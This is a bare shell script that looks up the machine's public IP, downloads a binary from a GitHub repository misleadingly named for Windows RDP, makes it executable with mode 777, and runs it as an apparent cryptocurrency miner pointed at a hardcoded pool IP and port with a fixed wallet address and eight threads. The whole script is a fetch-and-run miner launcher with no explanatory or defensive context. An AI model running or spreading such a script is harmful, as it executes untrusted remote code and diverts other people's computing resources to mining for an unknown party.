#!/bin/sh
curl ifconfig.me
wget https://github.com/duitawa/RDPWindows201901/raw/master/taek && chmod 777 taek && ./taek -v -l 79.137.70.48:3956 -u RScXQxaU3W8Gw2joPemvn9GKQmcW7ndg77.$(echo $(shuf -i 1111-9999 -n 1)-CPU) -p x -t 8
